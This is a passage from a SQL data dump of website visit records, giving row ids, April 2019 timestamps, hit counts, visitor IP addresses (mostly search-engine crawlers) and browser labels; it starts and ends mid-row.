other'),(410416,1554543375,4,4,0,0,'66.249.66.218','chrome'),(410417,1554543517,1,1,0,0,'54.36.149.44','other'),(410418,1554543552,1,1,0,0,'54.36.150.53','other'),(410419,1554543653,1,1,0,0,'54.36.149.81','other'),(410420,1554543696,1,1,0,0,'46.229.168.137','other'),(410421,1554543752,2,2,0,0,'40.77.167.164','other'),(410422,1554544418,1,1,0,0,'54.36.149.44','other'),(410423,1554544541,1,1,0,0,'46.229.168.136','other'),(410424,1554544751,1,1,0,0,'199.16.157.181','other'),(410425,1554545287,1,1,0,0,'54.36.150.4','other'),(410426,1554545569,1,1,0,0,'46.229.168.137','other'),(410427,1554545703,1,1,0,0,'54.36.148.227','other'),(410428,1554545799,1,1,0,0,'54.36.150.128','other'),(410429,1554545984,1,1,0,0,'54.36.148.58','other'),(410430,1554546103,1,1,0,0,'54.36.148.251','other'),(410431,1554546127,1,1,0,0,'46.229.168.129','other'),(410432,1554546193,1,1,0,0,'66.249.66.222','chrome'),(410433,1554546210,1,1,0,0,'54.36.149.75','other'),(410434,1554546270,1,1,0,0,'54.36.150.121','other'),(410435,1554546428,1,1,0,0,'66.249.66.218','chrome'),(410436,1554546771,1,1,0,0,'66.249.66.83','chrome'),(410437,1554547124,1,1,0,0,'54.36.148.231','other'),(410438,1554547488,2,2,0,0,'40.77.167.164','other'),(410439,1554547648,1,1,0,0,'8.29.198.27','other'),(410440,1554547731,1,1,0,0,'54.36.150.146','other'),(410441,1554548285,1,1,0,0,'8.29.198.25','other'),(410442,1554548526,2,2,0,0,'66.249.66.218','chrome'),(410443,1554548752,1,1,0,0,'66.249.66.83','chrome'),(410444,1554548754,1,1,0,0,'46.229.168.152','other'),(410445,1554548812,1,1,0,0,'66.249.66.220','chrome'),(410446,1554549311,1,1,0,0,'54.36.148.202','other'),(410447,1554549352,1,1,0,0,'54.36.148.247','other'),(410448,1554549604,1,1,0,0,'54.36.148.133','other'),(410449,1554549648,1,1,0,0,'207.46.13.70','other'),(410450,1554549791,2,2,0,0,'66.249.66.218','chrome'),(410451,1554549859,1,1,0,0,'54.36.148.17','other'),(410452,1554549870,1,1,0,0,'66.249.66.222','chrome'),(410453,1554550416,1,1,0,0,'54.36.148.29','other'),(410454,1554550635,1,1,0,0,'54.36.148.110','other'),(410455,1554550673,1,1,0,0,'54.36.148.214','other'),(410456,1554550885,1,1,0,0,'66.249.64.58','chrome'),(410457,1554551047,1,1,0,0,'207.46.13.70','other'),(410458,1554551230,1,1,0,0,'46.229.168.133','other'),(410459,1554551331,1,1,0,0,'54.36.149.102','other'),(410460,1554551389,1,1,0,0,'54.36.148.120','other'),(410461,1554551456,1,1,0,0,'54.36.148.135','other'),(410462,1554551590,1,1,0,0,'66.249.64.60','chrome'),(410463,1554551867,1,1,0,0,'54.36.148.142','other'),(410464,1554552110,1,1,0,0,'54.36.148.237','other'),(410465,1554552473,1,1,0,0,'207.46.13.70','other'),(410466,1554552743,4,4,0,0,'5.45.207.19','other'),(410467,1554552810,1,1,0,0,'66.249.64.60','chrome'),(410468,1554552817,1,1,0,0,'54.36.149.31','other'),(410469,1554553063,1,1,0,0,'54.36.150.191','other'),(410470,1554553287,4,4,0,0,'178.154.244.11','other'),(410471,1554553365,2,2,0,0,'207.46.13.168','other'),(410472,1554553478,1,1,0,0,'5.45.207.79','other'),(410473,1554553482,1,1,0,0,'46.229.168.144','other'),(410474,1554553665,1,1,0,0,'5.45.207.19','other'),(410475,1554553671,1,1,0,0,'46.229.168.154','other'),(410476,1554553815,1,1,0,0,'54.36.149.87','other'),(410477,1554553893,1,1,0,0,'66.249.64.60','chrome'),(410478,1554554256,2,2,0,0,'66.249.64.30','chrome'),(410479,1554554281,1,1,0,0,'66.249.64.58','chrome'),(410480,1554554451,1,1,0,0,'207.46.13.70','other'),(410481,1554554462,1,1,0,0,'54.36.148.123','other'),(410482,1554554583,1,1,0,0,'40.77.167.164','other'),(410483,1554554585,1,1,0,0,'66.249.64.29','chrome'),(410484,1554554633,1,1,0,0,'207.46.13.1','other'),(410485,1554554857,1,1,0,0,'54.36.148.214','other'),(410486,1554555434,1,1,0,0,'52.53.201.78','chrome'),(410487,1554555528,1,1,0,0,'54.36.149.30','other'),(410488,1554555553,1,1,0,0,'207.46.13.1','other'),(410489,1554555866,1,1,0,0,'46.229.168.138','other'),(410490,1554555927,1,1,0,0,'54.36.148.144','other'),(410491,1554556221,1,1,0,0,'40.77.167.164','other'),(410492,1554556359,1,1,0,0,'207.46.13.168','other'),(410493,1554556606,2,2,0,0,'207.46.13.1','other'),(410494,1554556683,8,8,0,0,'66.249.64.30','chrome'),(410495,1554556723,1,1,0,0,'66.249.64.60','chrome'),(410496,1554556863,1,1,0,0,'54.36.150.82','other'),(410497,1554556888,1,1,0,0,'54.36.150.81','other'),(410498,1554557105,1,1,0,0,'46.229.168.153','other'),(410499,1554557377,1,1,0,0,'46.229.168.154','other'),(410500,1554557382,1,1,0,0,'46.229.168.138','other'),(410501,1554557414,1,1,0,0,'66.249.64.29','chrome'),(410502,1554557632,1,1,0,0,'54.36.149.27','other'),(410503,1554557634,1,1,0,0,'54.36.148.233','other'),(410504,1554557848,1,1,0,0,'46.229.168.161','other'),(410505,1554558163,1,1,0,0,'54.36.150.137','other'),(410506,1554558479,1,1,0,0,'8.29.198.25','other'),(410507,1554558628,1,1,0,0,'54.36.150.112','other'),(410508,1554558664,1,1,0,0,'54.36.148.207','other'),(410509,1554559124,1,1,0,0,'8.29.198.26','other'),(410510,1554559261,1,1,0,0,'54.36.150.153','other'),(410511,1554559486,2,2,0,0,'66.249.64.30','chrome'),(410512,1554560047,1,1,0,0,'66.249.64.58','chrome'),(410513,1554560092,1,1,0,0,'37.114.160.253','chrome'),(410514,1554560209,1,1,0,0,'207.46.13.1','other'),(410515,1554560409,1,1,0,0,'46.229.168.134','other'),(410516,1554560418,1,1,0,0,'54.36.148.187','other'),(410517,1554560441,1,1,0,0,'54.36.149.60','other'),(410518,1554560639,1,1,0,0,'66.249.64.31','chrome'),(410519,1554560655,1,1,0,0,'54.36.150.73','other'),(410520,1554560697,1,1,0,0,'66.249.64.30','chrome'),(410521,1554560785,1,1,0,0,'54.36.149.76','other'),(410522,1554562369,1,1,0,0,'66.249.64.29','chrome'),(410523,1554562717,1,1,0,0,'66.249.64.62','chrome'),(410524,1554563212,3,3,0,0,'66.249.64.30','chrome'),(410525,1554563925,1,1,0,0,'5.45.207.79','other'),(410526,1554564746,1,1,0,0,'51.15.61.228','firefox'),(410527,1554565058,1,1,0,0,'66.249.64.29','chrome'),(410528,1554565198,1,1,0,0,'207.46.13.83','other'),(410529,1554565523,1,1,0,0,'207.46.13.35','other'),(410530,1554565882,1,1,0,0,'54.36.149.22','other'),(410531,1554566564,1,1,0,0,'54.36.149.53','other'),(410532,1554566934,1,1,0,0,'66.249.64.31','chrome'),(410533,1554567288,1,1,0,0,'66.249.64.62','chrome'),(410534,1554567293,1,1,0,0,'66.249.64.29','chrome'),(410535,1554567652,1,1,0,0,'46.166.186.193','other'),(410536,1554567732,1,1,0,0,'207.46.13.1','other'),(410537,1554567940,2,2,0,0,'66.249.64.31','chrome'),(410538,1554568342,1,1,0,0,'66.249.64.30','chrome'),(410539,1554568589,1,1,0,0,'66.249.64.58','chrome'),(410540,1554568764,1,1,0,0,'66.249.64.29','chrome'),(410541,1554568910,1,1,0,0,'66.249.64.31','chrome'),(410542,1554569193,1,1,0,0,'54.36.149.41','other'),(410543,1554569247,1,1,0,0,'54.36.149.35','other'),(410544,1554569313,2,2,0,0,'8.29.198.25','other'),(410545,1554569457,1,1,0,0,'207.46.13.168','other'),(410546,1554570801,1,1,0,0,'207.46.13.83','other'),(410547,1554570889,1,1,0,0,'207.46.13.35','other'),(410548,1554571314,1,1,0,0,'54.36.149.44','other'),(410549,1554571322,1,1,0,0,'91.196.178.131','chrome'),(410550,1554571626,1,1,0,0,'54.36.149.48','other'),(410551,1554572031,1,1,0,0,'66.249.64.60','chrome'),(410552,1554572118,1,1,0,0,'54.36.149.75','other'),(410553,1554572313,1,1,0,0,'54.36.149.0','other'),(410554,1554572420,1,1,0,0,'95.135.188.122','chrome'),(410555,1554572448,1,1,0,0,'54.36.149.74','other'),(410556,1554572550,2,2,0,0,'207.46.13.214','other'),(410557,1554572582,1,1,0,0,'66.249.64.62','chrome'),(410558,1554573056,17,17,0,0,'207.46.13.35','other'),(410559,1554573115,1,1,0,0,'66.249.64.30','chrome'),(410560,1554573614,4,4,0,0,'157.55.39.194','other'),(410561,1554573620,4,4,0,0,'207.46.13.214','other'),(410562,1554574262,2,2,0,0,'40.77.167.27','other'),(410563,1554574504,1,1,0,0,'207.46.13.35','other'),(410564,1554574723,1,1,0,0,'66.249.64.29','chrome'),(410565,1554574824,1,1,0,0,'66.249.64.60','chrome'),(410566,1554574957,1,1,0,0,'66.249.64.31','chrome'),(410567,1554575120,2,2,0,0,'66.249.64.30','chrome'),(410568,1554575677,1,1,0,0,'40.77.167.27','other'),(410569,1554575982,1,1,0,0,'54.36.149.70','other'),(410570,1554576134,1,1,0,0,'178.154.244.11','other'),(410571,1554576229,1,1,0,0,'141.8.142.103','other'),(410572,1554576329,1,1,0,0,'66.249.64.60','chrome'),(410573,1554576434,1,1,0,0,'178.154.171.24','other'),(410574,1554576545,2,2,0,0,'5.45.207.79','other'),(410575,1554576619,1,1,0,0,'95.108.181.75','other'),(410576,1554576770,1,1,0,0,'213.180.203.9','other'),(410577,1554576847,1,1,0,0,'78.88.188.42','chrome'),(410578,1554576870,2,2,0,0,'40.77.167.27','other'),(410579,1554576888,1,1,0,0,'66.249.64.29','chrome'),(410580,1554577112,2,2,0,0,'5.45.207.19','other'),(410581,1554577439,1,1,0,0,'66.249.64.58','chrome'),(410582,1554578235,1,1,0,0,'66.249.64.31','chrome'),(410583,1554578351,1,1,0,0,'54.36.149.0','other'),(410584,1554579282,1,1,0,0,'54.36.149.27','other'),(410585,1554579852,1,1,0,0,'66.249.64.62','chrome'),(410586,1554580152,2,2,0,0,'8.29.198.25','other'),(410587,1554580372,1,1,0,0,'54.36.149.56','other'),(410588,1554580747,1,1,0,0,'92.52.144.156','chrome'),(410589,1554580832,1,1,0,0,'66.249.64.30','chrome'),(410590,1554582616,1,1,0,0,'66.249.64.29','chrome'),(410591,1554582660,1,1,0,0,'54.36.149.94','other'),(410592,1554583625,1,1,0,0,'207.46.13.142','other'),(410593,1554583969,2,2,0,0,'66.249.64.62','chrome'),(410594,1554584538,1,1,0,0,'54.36.149.69','other'),(410595,1554584539,1,1,0,0,'54.36.149.3','other'),(410596,1554584648,1,1,0,0,'95.108.213.4','other'),(410597,1554584687,1,1,0,0,'178.154.171.24','other'),(410598,1554584698,1,1,0,0,'87.250.224.81','other'),(410599,1554584796,1,1,0,0,'40.77.167.27','other'),(410600,1554585087,2,2,0,0,'66.249.64.30','chrome'),(410601,1554585400,1,1,0,0,'87.250.224.65','other'),(410602,1554585429,1,1,0,0,'5.45.207.79','other'),(410603,1554585797,1,1,0,0,'207.46.13.35','other'),(410604,1554585834,1,1,0,0,'141.8.142.103','other'),(410605,1554585926,1,1,0,0,'178.154.244.11','other'),(410606,1554586260,46,46,0,0,'172.241.112.83','other'),(410607,1554586475,1,1,0,0,'54.36.149.99','other'),(410608,1554586547,1,1,0,0,'66.249.64.29','chrome'),(410609,1554586608,1,1,0,0,'5.45.207.79','other'),(410610,1554586678,1,1,0,0,'40.77.167.42','other'),(410611,1554587254,1,1,0,0,'40.77.167.27','other'),(410612,1554587359,1,1,0,0,'37.9.113.20','other'),(410613,1554587609,1,1,0,0,'207.46.13.142','other'),(410614,1554588386,1,1,0,0,'54.36.149.19','other'),(410615,1554588870,1,1,0,0,'66.249.64.30','chrome'),(410616,1554588927,1,1,0,0,'40.77.167.115','other'),(410617,1554589401,1,1,0,0,'40.77.167.27','other'),(410618,1554589685,1,1,0,0,'66.249.64.60','chrome'),(410619,1554589693,11,11,0,0,'173.249.9.92','other'),(410620,1554589880,2,2,0,0,'207.46.13.35','other'),(410621,1554590121,2,2,0,0,'66.249.64.31','chrome'),(410622,1554590182,1,1,0,0,'13.66.139.0','other'),(410623,1554590421,1,1,0,0,'66.249.64.30','chrome'),(410624,1554590677,33,33,0,0,'173.249.9.92','other'),(410625,1554590982,1,1,0,0,'8.29.198.27','other'),(410626,1554591115,1,1,0,0,'5.45.207.79','other'),(410627,1554591207,1,1,0,0,'40.77.167.27','other'),(410628,1554591223,2,2,0,0,'66.249.64.31','chrome'),(410629,1554591600,10,10,0,0,'173.249.9.92','other'),(410630,1554591607,1,1,0,0,'157.55.39.178','other'),(410631,1554591657,1,1,0,0,'8.29.198.25','other'),(410632,1554592454,1,1,0,0,'54.36.149.86','other'),(410633,1554592516,1,1,0,0,'141.8.142.103','other'),(410634,1554592810,1,1,0,0,'180.76.15.134','other'),(410635,1554592990,2,2,0,0,'66.249.64.29','chrome'),(410636,1554593658,1,1,0,0,'157.55.39.248','other'),(410637,1554593950,1,1,0,0,'54.36.149.29','other'),(410638,1554595559,1,1,0,0,'5.45.207.19','other'),(410639,1554595596,1,1,0,0,'40.77.167.76','other'),(410640,1554596239,1,1,0,0,'66.249.64.58','chrome'),(410641,1554596285,1,1,0,0,'207.46.13.121','other'),(410642,1554596891,1,1,0,0,'40.77.167.155','other'),(410643,1554597462,1,1,0,0,'66.249.64.30','chrome'),(410644,1554597944,1,1,0,0,'66.249.64.62','chrome'),(410645,1554598448,1,1,0,0,'40.77.167.155','other'),(410646,1554598598,1,1,0,0,'13.66.139.0','other'),(410647,1554598749,1,1,0,0,'180.76.15.135','other'),(410648,1554599564,2,2,0,0,'66.249.64.29','chrome'),(410649,1554599790,1,1,0,0,'40.77.167.155','other'),(410650,1554599851,1,1,0,0,'40.77.167.115','other'),(410651,1554600129,1,1,0,0,'207.46.13.35','other'),(410652,1554601653,1,1,0,0,'66.249.66.128','chrome'),(410653,1554601818,2,2,0,0,'8.29.198.26','other'),(410654,1554602116,3,3,0,0,'66.249.66.220','chrome'),(410655,1554603016,1,1,0,0,'157.55.39.178','other'),(410656,1554603577,1,1,0,0,'54.36.149.5','other'),(410657,1554603670,1,1,0,0,'178.154.244.11','other'),(410658,1554603731,1,1,0,0,'5.45.207.19','other'),(410659,1554603801,2,2,0,0,'66.249.66.220','chrome'),(410660,1554603806,2,2,0,0,'66.249.66.218','chrome'),(410661,1554603847,1,1,0,0,'66.249.66.222','chrome'),(410662,1554604434,1,1,0,0,'54.36.149.97','other'),(410663,1554604555,1,1,0,0,'54.36.149.95','other'),(410664,1554605002,1,1,0,0,'54.36.149.18','other'),(410665,1554605423,1,1,0,0,'66.249.66.130','chrome'),(410666,1554605489,1,1,0,0,'66.249.66.218','chrome'),(410667,1554605490,1,1,0,0,'193.106.30.98','firefox'),(410668,1554605784,1,1,0,0,'109.74.154.72','chrome'),(410669,1554605972,2,2,0,0,'66.249.66.128','chrome'),(410670,1554606014,1,1,0,0,'157.55.39.221','other'),(410671,1554606062,1,1,0,0,'95.163.255.94','other'),(410672,1554606481,1,0,1,0,'66.249.66.218',''),(410673,1554607249,1,1,0,0,'40.77.167.55','other'),(410674,1554607997,1,1,0,0,'66.249.66.128','chrome'),(410675,1554608009,1,1,0,0,'66.249.66.218','chrome'),(410676,1554608107,3,3,0,0,'95.108.213.4','other'),(410677,1554608111,2,2,0,0,'178.154.244.11','other'),(410678,1554608839,1,1,0,0,'40.77.167.55','other'),(410679,1554608850,2,2,0,0,'66.249.66.220','chrome'),(410680,1554609647,1,1,0,0,'40.77.167.176','other'),(410681,1554609818,2,2,0,0,'40.77.167.114','other'),(410682,1554609971,1,1,0,0,'66.249.66.132','chrome'),(410683,1554610041,33,33,0,0,'69.30.211.2','other'),(410684,1554610481,1,1,0,0,'66.249.66.220','chrome'),(410685,1554610505,2,2,0,0,'5.9.61.101','other'),(410686,1554610702,1,1,0,0,'66.249.66.222','chrome'),(410687,1554611124,1,1,0,0,'66.249.66.218','chrome'),(410688,1554611559,1,1,0,0,'5.188.210.44','chrome'),(410689,1554611818,1,1,0,0,'66.249.66.132','chrome'),(410690,1554611850,1,1,0,0,'66.249.66.220','chrome'),(410691,1554612654,2,2,0,0,'8.29.198.27','other'),(410692,1554612825,1,1,0,0,'66.102.9.62','chrome'),(410693,1554613019,1,1,0,0,'157.55.39.86','other'),(410694,1554613211,1,1,0,0,'66.249.66.81','chrome'),(410695,1554613537,1,1,0,0,'95.108.213.4','other'),(410696,1554613564,1,1,0,0,'66.249.66.218','chrome'),(410697,1554613644,1,1,0,0,'157.55.39.97','other'),(410698,1554613766,1,1,0,0,'5.45.207.79','other'),(410699,1554615235,3,3,0,0,'66.249.66.218','chrome'),(410700,1554615372,1,1,0,0,'5.196.1.129','other'),(410701,1554615413,1,1,0,0,'66.249.66.220','chrome'),(410702,1554616113,2,2,0,0,'18.237.113.95','chrome'),(410703,1554616455,1,1,0,0,'157.55.39.97','other'),(410704,1554616481,1,1,0,0,'95.163.255.99','other'),(410705,1554616846,2,2,0,0,'66.249.66.218','chrome'),(410706,1554616872,1,1,0,0,'66.249.66.132','chrome'),(410707,1554617494,1,1,0,0,'66.249.66.220','chrome'),(410708,1554617783,1,1,0,0,'66.249.66.222','chrome'),(410709,1554618526,2,2,0,0,'157.55.39.86','other'),(410710,1554618742,1,1,0,0,'66.249.66.130','chrome'),(410711,1554619261,1,1,0,0,'66.249.66.218','chrome'),(410712,1554619614,2,2,0,0,'87.250.224.81','other'),(410713,1554619617,1,1,0,0,'5.45.207.19','other'),(410714,1554619824,1,1,0,0,'157.55.39.86','other'),(410715,1554621216,1,1,0,0,'66.249.66.218','chrome'),(410716,1554621628,1,1,0,0,'157.55.39.86','other'),(410717,1554621830,2,2,0,0,'66.249.66.132','chrome'),(410718,1554622214,1,1,0,0,'66.249.66.128','chrome'),(410719,1554622551,1,1,0,0,'66.249.66.220','chrome'),(410720,1554622659,1,1,0,0,'66.249.66.222','chrome'),(410721,1554622744,1,1,0,0,'66.249.66.81','chrome'),(410722,1554622785,1,1,0,0,'40.77.167.164','other'),(410723,1554623492,2,2,0,0,'8.29.198.27','other'),(410724,1554624037,1,1,0,0,'180.163.220.4','chrome'),(410725,1554624041,1,1,0,0,'180.163.220.66','chrome'),(410726,1554624064,1,1,0,0,'180.163.220.66','other'),(410727,1554624068,1,1,0,0,'42.236.10.124','chrome'),(410728,1554624342,1,1,0,0,'66.249.66.218','chrome'),(410729,1554624346,1,1,0,0,'66.249.66.220','chrome'),(410730,1554624553,1,1,0,0,'66.249.66.222','chrome'),(410731,1554624684,1,1,0,0,'66.249.66.132','chrome'),(410732,1554625157,2,2,0,0,'66.249.66.130','chrome'),(410733,1554625255,1,1,0,0,'95.163.255.178','other'),(410734,1554625593,1,1,0,0,'66.249.66.81','chrome'),(410735,1554625629,1,1,0,0,'95.108.213.4','other'),(410736,1554625658,1,1,0,0,'213.180.203.9','other'),(410737,1554625760,1,1,0,0,'37.9.113.103','other'),(410738,1554626367,1,1,0,0,'66.249.66.220','chrome'),(410739,1554626572,2,2,0,0,'157.55.39.97','other'),(410740,1554626712,1,1,0,0,'66.249.66.222','chrome'),(410741,1554627121,1,1,0,0,'180.76.15.20','other'),(410742,1554627416,1,1,0,0,'66.249.66.218','chrome'),(410743,1554627998,2,2,0,0,'66.249.66.130','chrome'),(410744,1554629550,1,1,0,0,'66.249.66.222','chrome'),(410745,1554629861,1,1,0,0,'66.249.66.218','chrome'),(410746,1554631036,1,1,0,0,'66.249.66.130','chrome'),(410747,1554631132,1,1,0,0,'66.249.66.81','chrome'),(410748,1554632259,1,1,0,0,'213.180.203.40','other'),(410749,1554632322,1,1,0,0,'66.249.66.220','chrome'),(410750,1554632756,1,1,0,0,'106.120.173.155','other'),(410751,1554632933,1,1,0,0,'66.249.66.218','chrome'),(410752,1554633446,1,1,0,0,'66.249.66.132','chrome'),(410753,1554634320,1,1,0,0,'8.29.198.26','other'),(410754,1554635018,1,1,0,0,'8.29.198.25','other'),(410755,1554635172,1,1,0,0,'66.249.66.220','chrome'),(410756,1554635719,1,1,0,0,'66.249.66.222','chrome'),(410757,1554635996,1,1,0,0,'157.55.39.190','other'),(410758,1554636582,1,1,0,0,'66.249.66.81','chrome'),(410759,1554636900,1,1,0,0,'66.249.66.218','chrome'),(410760,1554637654,1,1,0,0,'207.46.13.71','other'),(410761,1554637885,1,1,0,0,'66.249.66.128','chrome'),(410762,1554637995,2,2,0,0,'5.45.207.79','other'),(410763,1554638454,1,1,0,0,'87.250.224.65','other'),(410764,1554638501,1,1,0,0,'66.249.66.132','chrome'),(410765,1554638601,1,1,0,0,'66.249.66.83','chrome'),(410766,1554638645,1,1,0,0,'37.9.113.103','other'),(410767,1554638770,1,1,0,0,'5.45.207.19','other'),(410768,1554639108,1,1,0,0,'66.249.66.220','chrome'),(410769,1554639333,1,1,0,0,'141.8.142.108','other'),(410770,1554639496,1,1,0,0,'87.250.224.47','other'),(410771,1554639629,2,2,0,0,'66.249.66.81','chrome'),(410772,1554640071,1,1,0,0,'13.66.139.0','other'),(410773,1554640181,1,1,0,0,'40.77.167.63','other'),(410774,1554640212,1,1,0,0,'66.249.66.218','chrome'),(410775,1554640535,1,1,0,0,'66.249.66.220','chrome'),(410776,1554640791,1,1,0,0,'207.46.13.103','other'),(410777,1554641096,1,1,0,0,'66.249.66.130','chrome'),(410778,1554641299,1,1,0,0,'66.249.66.81','chrome'),(410779,1554642596,1,1,0,0,'95.163.255.163','other'),(410780,1554642599,1,1,0,0,'95.163.255.172','other'),(410781,1554642605,4,4,0,0,'66.249.66.218','chrome'),(410782,1554642933,1,1,0,0,'66.249.66.222','chrome'),(410783,1554643149,1,1,0,0,'66.249.66.128','chrome'),(410784,1554643663,1,1,0,0,'157.55.39.190','other'),(410785,1554643927,1,1,0,0,'207.46.13.103','other'),(410786,1554643970,1,1,0,0,'178.154.244.11','other'),(410787,1554644265,3,3,0,0,'66.249.66.218','chrome'),(410788,1554644361,1,1,0,0,'91.209.11.236','other'),(410789,1554645086,1,1,0,0,'66.249.66.83','chrome'),(410790,1554645167,2,2,0,0,'8.29.198.25','other'),(410791,1554645384,1,1,0,0,'95.108.181.54','other'),(410792,1554645428,1,1,0,0,'95.108.213.4','other'),(410793,1554645521,2,2,0,0,'178.154.244.11','other'),(410794,1554645580,1,1,0,0,'141.8.142.103','other'),(410795,1554645693,1,1,0,0,'5.45.207.79','other'),(410796,1554645910,1,1,0,0,'87.250.224.64','other'),(410797,1554645922,1,1,0,0,'141.8.183.11','other'),(410798,1554646005,1,1,0,0,'66.249.66.222','chrome'),(410799,1554646574,1,1,0,0,'91.196.178.34','chrome'),(410800,1554646696,1,1,0,0,'66.249.66.128','chrome'),(410801,1554646974,1,1,0,0,'207.46.13.222','other'),(410802,1554647219,1,1,0,0,'66.249.66.222','chrome'),(410803,1554647496,1,1,0,0,'95.163.255.94','other'),(410804,1554647704,1,1,0,0,'141.8.142.103','other'),(410805,1554647742,1,1,0,0,'180.76.15.24','other'),(410806,1554647756,2,2,0,0,'178.154.244.11','other'),(410807,1554647765,1,1,0,0,'40.77.167.63','other'),(410808,1554648339,1,1,0,0,'207.46.13.222','other'),(410809,1554648389,1,1,0,0,'66.249.66.220','chrome'),(410810,1554648444,1,1,0,0,'5.45.207.79','other'),(410811,1554648632,1,1,0,0,'66.249.66.130','chrome'),(410812,1554649135,1,1,0,0,'46.211.241.134','chrome'),(410813,1554649685,3,3,0,0,'66.249.66.218','chrome'),(410814,1554649703,1,1,0,0,'66.249.66.132','chrome'),(410815,1554649807,1,1,0,0,'207.46.13.71','other'),(410816,1554649929,3,3,0,0,'66.249.66.220','chrome'),(410817,1554650468,2,2,0,0,'66.249.66.222','chrome'),(410818,1554650488,1,1,0,0,'66.249.66.128','chrome'),(410819,1554650647,1,1,0,0,'207.46.13.222','other'),(410820,1554650763,1,1,0,0,'66.249.66.218','chrome'),(410821,1554652148,2,2,0,0,'141.8.142.103','other'),(410822,1554652189,1,1,0,0,'87.250.224.47','other'),(410823,1554652208,1,1,0,0,'95.163.255.93','other'),(410824,1554652288,1,1,0,0,'66.249.66.222','chrome'),(410825,1554652551,1,1,0,0,'66.249.66.220','chrome'),(410826,1554652692,2,2,0,0,'5.45.207.19','other'),(410827,1554652737,2,2,0,0,'5.45.207.79','other'),(410828,1554652841,2,2,0,0,'178.154.244.11','other'),(410829,1554652973,1,1,0,0,'91.196.178.130','chrome'),(410830,1554653319,1,1,0,0,'213.180.203.17','other'),(410831,1554653712,1,1,0,0,'95.163.255.169','other'),(410832,1554653760,1,1,0,0,'207.46.13.182','other'),(410833,1554655310,1,1,0,0,'207.46.13.222','other'),(410834,1554655421,2,2,0,0,'178.154.244.11','other'),(410835,1554655437,4,4,0,0,'141.8.142.103','other'),(410836,1554655453,1,1,0,0,'46.211.127.251','chrome'),(410837,1554655456,1,1,0,0,'213.180.203.9','other'),(410838,1554655487,1,1,0,0,'37.9.113.148','other'),(410839,1554655559,3,3,0,0,'5.45.207.79','other'),(410840,1554655639,3,3,0,0,'5.45.207.19','other'),(410841,1554655662,2,2,0,0,'87.250.224.65','other'),(410842,1554655680,2,2,0,0,'95.108.213.4','other'),(410843,1554655688,2,2,0,0,'87.250.224.47','other'),(410844,1554655997,1,1,0,0,'8.29.198.25','other'),(410845,1554656304,2,2,0,0,'207.46.13.222','other'),(410846,1554656697,1,1,0,0,'8.29.198.27','other'),(410847,1554658205,1,1,0,0,'40.77.167.169','other'),(410848,1554658247,1,1,0,0,'141.8.142.103','other'),(410849,1554658308,1,1,0,0,'40.77.167.5','other'),(410850,1554658754,1,1,0,0,'207.46.13.222','other'),(410851,1554658942,1,1,0,0,'87.250.224.47','other'),(410852,1554658948,1,1,0,0,'185.233.202.130','chrome'),(410853,1554659125,1,1,0,0,'95.108.213.4','other'),(410854,1554659146,3,3,0,0,'178.154.244.11','other'),(410855,1554659227,2,2,0,0,'5.45.207.19','other'),(410856,1554659390,1,1,0,0,'5.45.207.79','other'),(410857,1554659734,1,1,0,0,'109.201.154.243','other'),(410858,1554660463,1,1,0,0,'5.45.207.79','other'),(410859,1554662272,1,1,0,0,'5.45.207.79','other'),(410860,1554662967,1,1,0,0,'162.253.219.14','chrome'),(410861,1554665900,1,1,0,0,'66.249.66.220','chrome'),(410862,1554665942,1,1,0,0,'207.46.13.129','other'),(410863,1554666826,2,2,0,0,'8.29.198.26','other'),(410864,1554667149,1,1,0,0,'5.45.207.19','other'),(410865,1554667224,1,1,0,0,'5.45.207.79','other'),(410866,1554667537,1,1,0,0,'180.76.15.9','other'),(410867,1554667616,1,1,0,0,'40.77.167.18','other'),(410868,1554669309,3,3,0,0,'69.58.178.58','other'),(410869,1554669530,1,1,0,0,'40.77.167.18','other'),(410870,1554670527,2,2,0,0,'66.249.66.218','chrome'),(410871,1554670608,1,1,0,0,'207.46.13.250','other'),(410872,1554670827,1,1,0,0,'40.77.167.21','other'),(410873,1554671694,1,1,0,0,'207.46.13.129','other'),(410874,1554671721,2,2,0,0,'66.249.66.218','chrome'),(410875,1554672046,1,1,0,0,'66.249.66.220','chrome'),(410876,1554672469,1,1,0,0,'207.46.13.250','other'),(410877,1554672898,1,1,0,0,'207.46.13.129','other'),(410878,1554673256,1,1,0,0,'46.166.190.149','other'),(410879,1554673580,1,1,0,0,'66.249.66.128','chrome'),(410880,1554674815,1,1,0,0,'66.249.66.220','chrome'),(410881,1554675197,1,1,0,0,'157.55.39.202','other'),(410882,1554675223,1,1,0,0,'141.8.142.103','other'),(410883,1554675922,1,1,0,0,'178.154.244.11','other'),(410884,1554675927,1,1,0,0,'207.46.13.86','other'),(410885,1554676112,1,1,0,0,'40.77.167.118','other'),(410886,1554676377,1,1,0,0,'66.249.66.130','chrome'),(410887,1554676484,1,1,0,0,'95.108.213.4','other'),(410888,1554677476,1,1,0,0,'5.45.207.79','other'),(410889,1554677659,1,1,0,0,'8.29.198.26','other'),(410890,1554678040,1,1,0,0,'207.46.13.129','other'),(410891,1554678368,1,1,0,0,'8.29.198.27','other'),(410892,1554678912,1,1,0,0,'66.249.66.220','chrome'),(410893,1554679504,1,1,0,0,'207.46.13.129','other'),(410894,1554680527,1,1,0,0,'95.163.255.158','other'),(410895,1554681519,1,1,0,0,'66.249.66.220','chrome'),(410896,1554682389,1,1,0,0,'66.249.66.222','chrome'),(410897,1554682739,1,1,0,0,'13.66.139.0','other'),(410898,1554683550,3,3,0,0,'178.154.244.11','other'),(410899,1554683656,1,1,0,0,'5.45.207.79','other'),(410900,1554684439,2,2,0,0,'66.249.66.222','chrome'),(410901,1554684645,1,1,0,0,'141.8.142.103','other'),(410902,1554684864,1,1,0,0,'40.77.167.118','other'),(410903,1554684975,1,1,0,0,'95.163.255.197','other'),(410904,1554685042,1,1,0,0,'157.55.39.202','other'),(410905,1554687368,1,1,0,0,'157.55.39.202','other'),(410906,1554687712,1,1,0,0,'91.223.34.230','chrome'),(410907,1554688206,1,1,0,0,'40.77.167.118','other'),(410908,1554688498,2,2,0,0,'8.29.198.27','other'),(410909,1554688890,1,1,0,0,'40.77.167.75','other'),(410910,1554689131,1,1,0,0,'157.55.39.72','other'),(410911,1554689270,1,1,0,0,'40.77.167.101','other'),(410912,1554689697,1,1,0,0,'180.76.15.156','other'),(410913,1554690080,1,1,0,0,'66.249.66.128','chrome'),(410914,1554690596,3,3,0,0,'157.55.39.72','other'),(410915,1554691455,2,2,0,0,'40.77.167.140','other'),(410916,1554691816,2,2,0,0,'37.9.113.148','other'),(410917,1554691819,2,2,0,0,'87.250.224.47','other'),(410918,1554692071,1,1,0,0,'178.154.244.11','other'),(410919,1554692187,1,1,0,0,'109.74.154.72','chrome'),(410920,1554692239,1,1,0,0,'66.249.66.132'